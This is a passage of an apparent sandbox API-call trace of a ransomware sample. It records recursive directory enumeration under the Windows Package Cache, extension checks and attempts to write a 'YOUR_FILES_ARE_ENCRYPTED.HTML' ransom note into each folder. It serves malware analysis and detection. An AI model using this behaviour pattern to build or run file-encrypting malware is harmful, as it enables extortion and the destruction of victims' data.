dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.153] GetProcessHeap () returned 0x270000 [0170.154] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.154] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", cAlternateFileName="{2BC3B~1.285")) returned 1 [0170.154] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned 87 [0170.154] GetProcessHeap () returned 0x270000 [0170.154] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.154] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" [0170.154] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*" [0170.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.154] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.154] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.154] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned 96 [0170.154] GetProcessHeap () returned 0x270000 [0170.154] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.154] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" [0170.154] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*" [0170.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.155] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.155] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc772da0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc772da0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.155] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned 117 [0170.155] GetProcessHeap () returned 0x270000 [0170.155] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.155] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" [0170.155] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*" [0170.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc772da0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc772da0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.155] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc772da0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc772da0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.155] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb21afe00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xb21afe00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xcc831480, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x14de75, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D", cAlternateFileName="CAB1CA~1.478")) returned 1 [0170.155] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D") returned 191 [0170.155] lstrcmpW (lpString1="cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.156] PathFindExtensionW 
(pszPath="cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D") returned=".47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D" [0170.156] lstrlenW (lpString=".47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D") returned 65 [0170.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec849b00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xec849b00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xec849b00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.156] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 143 [0170.156] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.156] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.156] lstrlenW (lpString=".msi") returned 4 [0170.156] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc74cc40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc74cc40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc831480, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.156] wnsprintfW (in: 
pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0170.156] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc74cc40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc74cc40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc831480, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.156] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.156] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0170.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.156] GetProcessHeap () returned 0x270000 [0170.157] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.157] FindNextFileW (in: hFindFile=0x42f31c0, 
lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8575e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.157] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.157] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.157] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8575e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.157] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.158] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package 
cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.158] GetProcessHeap () returned 0x270000 [0170.158] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.158] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8575e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.159] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0170.159] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.159] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8575e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.159] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.159] wnsprintfW (in: pszDest=0x74fa010, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0170.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.159] GetProcessHeap () returned 0x270000 [0170.160] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.160] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0170.160] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 75 [0170.160] GetProcessHeap () returned 0x270000 [0170.160] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.160] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0170.160] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*" [0170.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.160] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.160] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf974b9d0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xfc4f7ff0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) 
returned 1 [0170.161] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 85 [0170.161] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.161] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.161] lstrlenW (lpString=".rsm") returned 4 [0170.161] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.161] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf96ff710, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xbe37ee50, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0170.161] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 92 [0170.161] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.161] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0170.161] lstrlenW (lpString=".exe") returned 4 [0170.161] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0170.161] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc87d740, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, 
